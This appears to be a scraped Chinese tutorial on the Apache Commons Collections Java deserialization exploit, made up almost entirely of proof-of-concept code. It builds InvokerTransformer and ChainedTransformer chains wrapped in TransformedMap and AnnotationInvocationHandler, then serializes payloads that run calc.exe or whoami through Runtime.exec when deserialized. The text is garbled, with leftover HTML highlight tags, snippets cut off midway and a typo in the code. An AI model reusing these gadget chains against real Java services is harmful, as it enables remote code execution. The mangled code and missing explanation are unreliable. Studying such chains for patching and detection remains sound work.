Java commons-collections是JDK 1.2中的一个主要新增部分。它添加了许多强大的数据结构，可以加速大多数重要Java应用程序的开发。从那时起，它已经成为Java中公认...
<\/p>
<\/p>
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;<\/p>
public class Commons_collections_Test {<\/p>
<span class="hljs-function"><span class="hljs-keyword">public<\/span> <span class="hljs-keyword">static<\/span> <span class="hljs-keyword">void<\/span> <span class="hljs-title">main<\/span><span class="hljs-params">(String[] args)<\/span> <span class="hljs-keyword">throws<\/span> Exception <\/span>{
    <span class="hljs-comment">\/\/1.客户端构建攻击代码<\/span>
    <span class="hljs-comment">\/\/此处构建了一个transformers的数组，在其中构建了任意函数执行的核心代码<\/span>
    Transformer[] transformers = <span class="hljs-keyword">new<\/span> Transformer[] {
            <span class="hljs-keyword">new<\/span> ConstantTransformer(Runtime.class),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"getMethod"<\/span>, <span class="hljs-keyword">new<\/span> Class[] {String.class, Class[].class }, <span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-string">"getRuntime"<\/span>, <span class="hljs-keyword">new<\/span> Class[<span class="hljs-number">0<\/span>] }),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"invoke"<\/span>, <span class="hljs-keyword">new<\/span> Class[] {Object.class, Object[].class }, <span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-keyword">null<\/span>, <span class="hljs-keyword">new<\/span> Object[<span class="hljs-number">0<\/span>] }),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"exec"<\/span>, <span class="hljs-keyword">new<\/span> Class[] {String.class }, <span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-string">"calc.exe"<\/span>})
    };
    <span class="hljs-comment">\/\/将transformers数组存入ChaniedTransformer这个继承类<\/span>
    Transformer transformerChain = <span class="hljs-keyword">new<\/span> ChainedTransformer(transformers);

    <span class="hljs-comment">\/\/创建Map并绑定transformerChain<\/span>
    Map innerMap = <span class="hljs-keyword">new<\/span> HashMap();
    innerMap.put(<span class="hljs-string">"value"<\/span>, <span class="hljs-string">"value"<\/span>);
    <span class="hljs-comment">\/\/给予map数据转化链<\/span>
    Map outerMap = TransformedMap.decorate(innerMap, <span class="hljs-keyword">null<\/span>, transformerChain);
    <span class="hljs-comment">\/\/反射机制调用AnnotationInvocationHandler类的构造函数<\/span>
    Class cl = Class.forName(<span class="hljs-string">"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);
    Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
    <span class="hljs-comment">\/\/取消构造函数修饰符限制<\/span>
    ctor.setAccessible(<span class="hljs-keyword">true<\/span>);
    <span class="hljs-comment">\/\/获取AnnotationInvocationHandler类实例<\/span>
    Object instance = ctor.newInstance(Target.class, outerMap);

    <span class="hljs-comment">\/\/payload序列化写入文件，模拟网络传输<\/span>
    FileOutputStream f = <span class="hljs-keyword">new<\/span> FileOutputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectOutputStream fout = <span class="hljs-keyword">new<\/span> ObjectOutputStream(f);
    fout.writeObject(instance);

    <span class="hljs-comment">\/\/2.服务端读取文件，反序列化，模拟网络传输<\/span>
    FileInputStream fi = <span class="hljs-keyword">new<\/span> FileInputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectInputStream fin = <span class="hljs-keyword">new<\/span> ObjectInputStream(fi);
    <span class="hljs-comment">\/\/服务端反序列化<\/span>
    fin.readObject();
}
<\/code><\/pre>
}

<\/p>

            <span class="hljs-comment">\/\/input必须为Runtime的实例，cls才会等于Runtime类，<\/span>
            Class cls = input.getClass();

            <span class="hljs-comment">\/\/this.iMethodName等于exec，this.iParamTypes等于String.class<\/span>
            Method method = cls.getMethod(<span class="hljs-keyword">this<\/span>.iMethodName, <span class="hljs-keyword">this<\/span>.iParamTypes);
            <span class="hljs-comment">\/\/this.Args为要执行的命令<\/span>
            <span class="hljs-keyword">return<\/span> method.invoke(input, <span class="hljs-keyword">this<\/span>.iArgs); 
        } 
       .........
}
<\/code><\/pre>
}

<\/p>

public class Commons_collections_Test {

public static void main(String[] args) throws Exception {

InvokerTransformer invokerTransformer=new InvokerTransformer("exec",new Class[]{String.class},new String[]{"calc.exe"});

invokerTransformer.transform(Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(Class.forName("java.lang.Runtime")));<\/p>
}
<\/code><\/pre>
}<\/p>
<\/p>

public class Commons_collections_Test {<\/p>
<span class="hljs-function"><span class="hljs-keyword">public<\/span> <span class="hljs-keyword">static<\/span> <span class="hljs-keyword">void<\/span> <span class="hljs-title">main<\/span><span class="hljs-params">(String[] args)<\/span> <span class="hljs-keyword">throws<\/span> Exception <\/span>{

    <span class="hljs-comment">\/\/构造InvokerTransformer<\/span>
    InvokerTransformer a=<span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"exec"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{String.class},<span class="hljs-keyword">new<\/span> String[]{<span class="hljs-string">"calc.exe"<\/span>});

    <span class="hljs-comment">\/\/序列化<\/span>
    FileOutputStream f=<span class="hljs-keyword">new<\/span> FileOutputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectOutputStream fout=<span class="hljs-keyword">new<\/span> ObjectOutputStream(f);
    fout.writeObject(a);

    <span class="hljs-comment">\/\/构造传入transform的参数，Runtime实例<\/span>
    Object input=Class.forName(<span class="hljs-string">"java.lang.Runtime"<\/span>).getMethod(<span class="hljs-string">"getRuntime"<\/span>).invoke(Class.forName(<span class="hljs-string">"java.lang.Runtime"<\/span>));

    <span class="hljs-comment">\/\/反序列化<\/span>
    FileInputStream fi=<span class="hljs-keyword">new<\/span> FileInputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectInputStream fin=<span class="hljs-keyword">new<\/span> ObjectInputStream(fi);
    InvokerTransformer b=(InvokerTransformer) fin.readObject();

    <span class="hljs-comment">\/\/触发漏洞，调用transform，input为传入参数<\/span>
    b.transform(input);
}
<\/code><\/pre>
}

<\/p>

import java.io.FileInputStream;

import java.io.ObjectInputStream;

import java.io.Serializable;<\/p>
public class Serial implements Serializable  {

public static void main(String[] args) throws Exception{

\/\/构造传入transform的参数，为Runtime实例，

Object input=Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(Class.forName("java.lang.Runtime"));<\/p>
    <span class="hljs-comment">\/\/反序列化<\/span>
    FileInputStream fi=<span class="hljs-keyword">new<\/span> FileInputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectInputStream fin=<span class="hljs-keyword">new<\/span> ObjectInputStream(fi);
    InvokerTransformer b=(InvokerTransformer) fin.readObject();

    <span class="hljs-comment">\/\/触发漏洞，调用transform，input为传入参数<\/span>
    b.transform(input);
}
<\/code><\/pre>
}<\/p>
<\/p>

public class Commons_collections_Test {<\/p>
<span class="hljs-function"><span class="hljs-keyword">public<\/span> <span class="hljs-keyword">static<\/span> <span class="hljs-keyword">void<\/span> <span class="hljs-title">main<\/span><span class="hljs-params">(String[] args)<\/span> <span class="hljs-keyword">throws<\/span> Exception <\/span>{

    <span class="hljs-comment">\/\/构造Transformers数组<\/span>
    Transformer[] transformers=<span class="hljs-keyword">new<\/span> Transformer[]{
            <span class="hljs-keyword">new<\/span> ConstantTransformer(Class.forName(<span class="hljs-string">"java.lang.Runtime"<\/span>).getMethod(<span class="hljs-string">"getRuntime"<\/span>).invoke(Class.forName(<span class="hljs-string">"java.lang.Runtime"<\/span>))),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"exec"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{String.class},<span class="hljs-keyword">new<\/span> String[]{<span class="hljs-string">"calc.exe"<\/span>})
    };

    <span class="hljs-comment">\/\/用ChainedTransformer封装构造好的Transformers数组，也就是让构造好的数组等于this.iTransformers<\/span>
    Transformer transformerChain=<span class="hljs-keyword">new<\/span> ChainedTransformer(transformers);

    <span class="hljs-comment">\/\/序列化<\/span>
    FileOutputStream f=<span class="hljs-keyword">new<\/span> FileOutputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectOutputStream fout=<span class="hljs-keyword">new<\/span> ObjectOutputStream(f);
    fout.writeObject(transformerChain);

}
<\/code><\/pre>
}

<\/p>

public class Commons_collections_Test {<\/p>
<span class="hljs-function"><span class="hljs-keyword">public<\/span> <span class="hljs-keyword">static<\/span> <span class="hljs-keyword">void<\/span> <span class="hljs-title">main<\/span><span class="hljs-params">(String[] args)<\/span> <span class="hljs-keyword">throws<\/span> Exception <\/span>{

    <span class="hljs-comment">\/\/构造transformers<\/span>
    Transformer[] transformers=<span class="hljs-keyword">new<\/span> Transformer[]{
            <span class="hljs-keyword">new<\/span> ConstantTransformer(Runtime.class),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"getRuntime"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{},<span class="hljs-keyword">new<\/span> Object[]{}),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"exec"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{String.class},<span class="hljs-keyword">new<\/span> String[]{<span class="hljs-string">"calc.exe"<\/span>})
    };

    Transformer transformerChain=<span class="hljs-keyword">new<\/span> ChainedTransformer(transformers);

    transformerChain.transform(<span class="hljs-keyword">null<\/span>);
}
<\/code><\/pre>
}

<\/p>

    <span class="hljs-comment">\/\/invoke方法对象.invoke(input, this.iArgs)实际上等于input.invoke(this.iArgs)<\/span>
    Object input3=method3.invoke(input2,<span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-keyword">null<\/span>, <span class="hljs-keyword">new<\/span> Object[]{} }); <span class="hljs-comment">\/\/input3:Runtime实例<\/span>
<\/code><\/pre>
<\/p>

public class Commons_collections_Test {<\/p>
<span class="hljs-function"><span class="hljs-keyword">public<\/span> <span class="hljs-keyword">static<\/span> <span class="hljs-keyword">void<\/span> <span class="hljs-title">main<\/span><span class="hljs-params">(String[] args)<\/span> <span class="hljs-keyword">throws<\/span> Exception <\/span>{

    <span class="hljs-comment">\/\/第一次循环,返回了Runtie.class<\/span>
    Class input1=Runtime.class;

    <span class="hljs-comment">\/\/第二次循环<\/span>
    Class cls2=input1.getClass(); <span class="hljs-comment">\/\/cls2:java.lang.class类<\/span>
    Method method2=cls2.getMethod(<span class="hljs-string">"getMethod"<\/span>, String.class, Class[].class);<span class="hljs-comment">\/\/method2:通过反射获取到的getMethod对象<\/span>
    Object input2=method2.invoke(input1,<span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-string">"getRuntime"<\/span>, <span class="hljs-keyword">new<\/span> Class[]{} });<span class="hljs-comment">\/\/input2:getRuntime对象<\/span>

    <span class="hljs-comment">\/\/第三次循环，input是通过反射获取到的getRuntime对象<\/span>
    Class cls3=input2.getClass();<span class="hljs-comment">\/\/java.lang.reflec.Method类<\/span>
    Method method3=cls3.getMethod(<span class="hljs-string">"invoke"<\/span>, <span class="hljs-keyword">new<\/span> Class[] {Object.class, Object[].class });<span class="hljs-comment">\/\/method3:invoke方法对象.第二个参数为invoke的参数类型<\/span>

    <span class="hljs-comment">\/\/invoke方法对象.invoke(input, this.iArgs)实际上等于input.invoke(this.iArgs)<\/span>
    Object input3=method3.invoke(input2,<span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-keyword">null<\/span>, <span class="hljs-keyword">new<\/span> Object[]{} }); <span class="hljs-comment">\/\/input3:Runtime实例<\/span>

    <span class="hljs-comment">\/\/第四次循环，已经获取到了Runtime实例<\/span>
    Class cls4=input3.getClass(); <span class="hljs-comment">\/\/cls4:java.lang.Runtime类<\/span>
    Method method4=cls4.getMethod(<span class="hljs-string">"exec"<\/span>,<span class="hljs-keyword">new<\/span> Class[] {String.class });<span class="hljs-comment">\/\/method4:exec方法对象<\/span>
    method4.invoke(input3,<span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-string">"calc.exe"<\/span>});<span class="hljs-comment">\/\/exec方法对象.invoke(Runtime实例,参数)<\/span>

}
<\/code><\/pre>
}

<\/p>

import java.io.FileInputStream;

import java.io.FileOutputStream;

import java.io.ObjectInputStream;

import java.io.ObjectOutputStream;<\/p>
public class Commons_collections_Test {<\/p>
<span class="hljs-function"><span class="hljs-keyword">public<\/span> <span class="hljs-keyword">static<\/span> <span class="hljs-keyword">void<\/span> <span class="hljs-title">main<\/span><span class="hljs-params">(String[] args)<\/span> <span class="hljs-keyword">throws<\/span> Exception <\/span>{
    Transformer[] transformers=<span class="hljs-keyword">new<\/span> Transformer[]{
            <span class="hljs-keyword">new<\/span> ConstantTransformer(Runtime.class),
            <span class="hljs-comment">\/\/根据transform的执行规则，InvokeTransformer类构造函数的第一个参数为要执行的，第二个参数为一个Class[]，包含了要获取方法的参数类型。第三个参数为invoke的第二个参数<\/span>
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"getMethod"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{String.class,Class[].class},<span class="hljs-keyword">new<\/span> Object[]{<span class="hljs-string">"getRuntime"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{}}),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"invoke"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{Object.class,Object[].class},<span class="hljs-keyword">new<\/span> Object[]{<span class="hljs-keyword">null<\/span>,<span class="hljs-keyword">new<\/span> Object[]{}}),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"exec"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{String.class},<span class="hljs-keyword">new<\/span> Object[]{<span class="hljs-string">"calc"<\/span>})
    };

    <span class="hljs-comment">\/\/把构造好的数组封装成ChainedTransformer<\/span>
    ChainedChainedTransformer chainedTransformer=<span class="hljs-keyword">new<\/span> ChainedTransformer(transformers);

    <span class="hljs-comment">\/\/序列化数据<\/span>
    FileOutputStream fileOutputStream=<span class="hljs-keyword">new<\/span> FileOutputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectOutputStream objectOutputStream=<span class="hljs-keyword">new<\/span> ObjectOutputStream(fileOutputStream);
    objectOutputStream.writeObject(chainedTransformer);

    <span class="hljs-comment">\/\/反序列化数据<\/span>
    FileInputStream fileInputStream=<span class="hljs-keyword">new<\/span> FileInputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectInputStream objectInputStream=<span class="hljs-keyword">new<\/span> ObjectInputStream(fileInputStream);

    <span class="hljs-comment">\/\/调用反序列化后的ChainedTransformer类中的transform方法触发<\/span>
    ChainedTransformer SerialChainTransformer=(ChainedTransformer)objectInputStream.readObject();
    SerialChainTransformer.transform(<span class="hljs-keyword">null<\/span>);

}
<\/code><\/pre>
}

<\/p>

import java.io.FileInputStream;

import java.io.FileOutputStream;

import java.io.ObjectInputStream;

import java.io.ObjectOutputStream;

import java.util.HashMap;

import java.util.Map;<\/p>
public class Commons_collections_Test {<\/p>
<span class="hljs-function"><span class="hljs-keyword">public<\/span> <span class="hljs-keyword">static<\/span> <span class="hljs-keyword">void<\/span> <span class="hljs-title">main<\/span><span class="hljs-params">(String[] args)<\/span> <span class="hljs-keyword">throws<\/span> Exception <\/span>{
    Transformer[] transformers=<span class="hljs-keyword">new<\/span> Transformer[]{
            <span class="hljs-keyword">new<\/span> ConstantTransformer(Runtime.class),
            <span class="hljs-comment">\/\/根据transform的执行规则，InvokeTransformer类构造函数的第一个参数为要执行的，第二个参数为一个Class[]，包含了要获取方法的参数类型。第三个参数为invoke的第二个参数<\/span>
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"getMethod"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{String.class,Class[].class},<span class="hljs-keyword">new<\/span> Object[]{<span class="hljs-string">"getRuntime"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{}}),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"invoke"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{Object.class,Object[].class},<span class="hljs-keyword">new<\/span> Object[]{<span class="hljs-keyword">null<\/span>,<span class="hljs-keyword">new<\/span> Object[]{}}),
            <span class="hljs-keyword">new<\/span> InvokerTransformer(<span class="hljs-string">"exec"<\/span>,<span class="hljs-keyword">new<\/span> Class[]{String.class},<span class="hljs-keyword">new<\/span> Object[]{<span class="hljs-string">"calc"<\/span>})
    };

    <span class="hljs-comment">\/\/把构造好的数组封装成ChainedTransformer<\/span>
    ChainedTransformer chainedTransformer=<span class="hljs-keyword">new<\/span> ChainedTransformer(transformers);

    Map innerMap=<span class="hljs-keyword">new<\/span> HashMap();
    innerMap.put(<span class="hljs-string">"value"<\/span>,<span class="hljs-string">"value"<\/span>);

    Map map=TransformedMap.decorate(innerMap,<span class="hljs-keyword">null<\/span>,chainedTransformer);

    <span class="hljs-comment">\/\/序列化map<\/span>
    FileOutputStream fileOutputStream=<span class="hljs-keyword">new<\/span> FileOutputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectOutputStream objectOutputStream=<span class="hljs-keyword">new<\/span> ObjectOutputStream(fileOutputStream);
    objectOutputStream.writeObject(map);

    FileInputStream fileInputStream=<span class="hljs-keyword">new<\/span> FileInputStream(<span class="hljs-string">"payload.bin"<\/span>);
    ObjectInputStream objectInputStream=<span class="hljs-keyword">new<\/span> ObjectInputStream(fileInputStream);
    <span class="hljs-comment">\/\/反序列化<\/span>
    Map UnserializedMap=(Map)objectInputStream.readObject();

    <span class="hljs-comment">\/\/只要修改Map的值就会触发转换链，执行payload<\/span>

    <span class="hljs-comment">\/\/向Map中添加新值<\/span>
    <span class="hljs-comment">\/\/UnserializedMap.put("123","123");<\/span>
    <span class="hljs-comment">\/\/修改键值<\/span>
    Map.Entry entry  = (Map.Entry) UnserializedMap.entrySet().iterator().next();
    entry.setValue(<span class="hljs-string">"foobar"<\/span>);

}
<\/code><\/pre>
}

<\/p>

    <span class="hljs-keyword">try<\/span> {
        var2 = AnnotationType.getInstance(<span class="hljs-keyword">this<\/span>.type);
    } <span class="hljs-keyword">catch<\/span> (IllegalArgumentException var9) {
        <span class="hljs-keyword">return<\/span>;
    }

    Map var3 = var2.memberTypes();
    Iterator var4 = <span class="hljs-keyword">this<\/span>.memberValues.entrySet().iterator();

    <span class="hljs-keyword">while<\/span>(var4.hasNext()) {
        Entry var5 = (Entry)var4.next();
        String var6 = (String)var5.getKey();
        Class var7 = (Class)var3.get(var6);
        <span class="hljs-keyword">if<\/span> (var7 != <span class="hljs-keyword">null<\/span>) {
            Object var8 = var5.getValue();
            <span class="hljs-keyword">if<\/span> (!var7.isInstance(var8) &amp;&amp; !(var8 <span class="hljs-keyword">instanceof<\/span> ExceptionProxy)) {
                var5.setValue((<span class="hljs-keyword">new<\/span> AnnotationTypeMismatchExceptionProxy(var8.getClass() + <span class="hljs-string">"["<\/span> + var8 + <span class="hljs-string">"]"<\/span>)).setMember((Method)var2.members().get(var6))); <span class="hljs-comment">\/\/存在setValue<\/span>
            }
        }
    }

}
<\/code><\/pre>
<\/p>

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.map.TransformedMap;<\/p>
public class POC_Test{

public static void main(String[] args) throws Exception {

\/\/execArgs: 待执行的命令数组

\/\/String[] execArgs = new String[] { "sh", "-c", "whoami &gt; \/tmp\/fuck" };<\/p>
    <span class="hljs-comment">\/\/transformers: 一个transformer链，包含各类transformer对象（预设转化逻辑）的转化数组<\/span>
    Transformer[] transformers = <span class="hljs-keyword">new<\/span> Transformer[] {
        <span class="hljs-keyword">new<\/span> ConstantTransformer(Runtime.class),
        <span class="hljs-comment">\/*
        由于Method类的invoke(Object obj,Object args[])方法的定义
        所以在反射内写new Class[] {Object.class, Object[].class }
        正常POC流程举例：
        ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");
        *\/<\/span>
        <span class="hljs-keyword">new<\/span> InvokerTransformer(
            <span class="hljs-string">"getMethod"<\/span>,
            <span class="hljs-keyword">new<\/span> Class[] {String.class, Class[].class },
            <span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-string">"getRuntime"<\/span>, <span class="hljs-keyword">new<\/span> Class[<span class="hljs-number">0<\/span>] }
        ),
        <span class="hljs-keyword">new<\/span> InvokerTransformer(
            <span class="hljs-string">"invoke"<\/span>,
            <span class="hljs-keyword">new<\/span> Class[] {Object.class,Object[].class }, 
            <span class="hljs-keyword">new<\/span> Object[] {<span class="hljs-keyword">null<\/span>, <span class="hljs-keyword">null<\/span> }
        ),
        <span class="hljs-keyword">new<\/span> InvokerTransformer(
            <span class="hljs-string">"exec"<\/span>,
            <span class="hljs-keyword">new<\/span> Class[] {String[].class },
            <span class="hljs-keyword">new<\/span> Object[] { <span class="hljs-string">"whoami"<\/span> }
            <span class="hljs-comment">\/\/new Object[] { execArgs } <\/span>
        )
    };

    <span class="hljs-comment">\/\/transformedChain: ChainedTransformer类对象，传入transformers数组，可以按照transformers数组的逻辑执行转化操作<\/span>
    Transformer transformedChain = <span class="hljs-keyword">new<\/span> ChainedTransformer(transformers);

    <span class="hljs-comment">\/\/BeforeTransformerMap: Map数据结构，转换前的Map，Map数据结构内的对象是键值对形式，类比于python的dict<\/span>
    <span class="hljs-comment">\/\/Map&amp;lt;String, String&amp;gt; BeforeTransformerMap = new HashMap&amp;lt;String, String&amp;gt;();<\/span>
    Map&lt;String,String&gt; BeforeTransformerMap = <span class="hljs-keyword">new<\/span> HashMap&lt;String,String&gt;();

    BeforeTransformerMap.put(<span class="hljs-string">"hello"<\/span>, <span class="hljs-string">"hello"<\/span>);

    <span class="hljs-comment">\/\/Map数据结构，转换后的Map<\/span>
   <span class="hljs-comment">\/*
   TransformedMap.decorate方法,预期是对Map类的数据结构进行转化，该方法有三个参数。
        第一个参数为待转化的Map对象
        第二个参数为Map对象内的key要经过的转化方法（可为单个方法，也可为链，也可为空）
        第三个参数为Map对象内的value要经过的转化方法。
   *\/<\/span>
    <span class="hljs-comment">\/\/TransformedMap.decorate(目标Map, key的转化对象（单个或者链或者null）, value的转化对象（单个或者链或者null）);<\/span>
    Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, <span class="hljs-keyword">null<\/span>, transformedChain);

    Class cl = Class.forName(<span class="hljs-string">"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);

    Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
    ctor.setAccessible(<span class="hljs-keyword">true<\/span>);
    Object instance = ctor.newInstance(Target.class, AfterTransformerMap);

    File f = <span class="hljs-keyword">new<\/span> File(<span class="hljs-string">"temp.bin"<\/span>);
    ObjectOutputStream out = <span class="hljs-keyword">new<\/span> ObjectOutputStream(<span class="hljs-keyword">new<\/span> FileOutputStream(f));
    out.writeObject(instance);
}
<\/code><\/pre>
}<\/p>
\/*

思路:构建BeforeTransformerMap的键值对，为其赋值，

利用TransformedMap的decorate方法，对Map数据结构的key\/value进行transforme

对BeforeTransformerMap的value进行转换，当BeforeTransformerMap的value执行完一个完整转换链，就完成了命令执行<\/p>
 执行本质: ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec(.........)
 利用反射调用Runtime() 执行了一段系统命令, Runtime.getRuntime().exec()
<\/code><\/pre>
*\/

<\/p>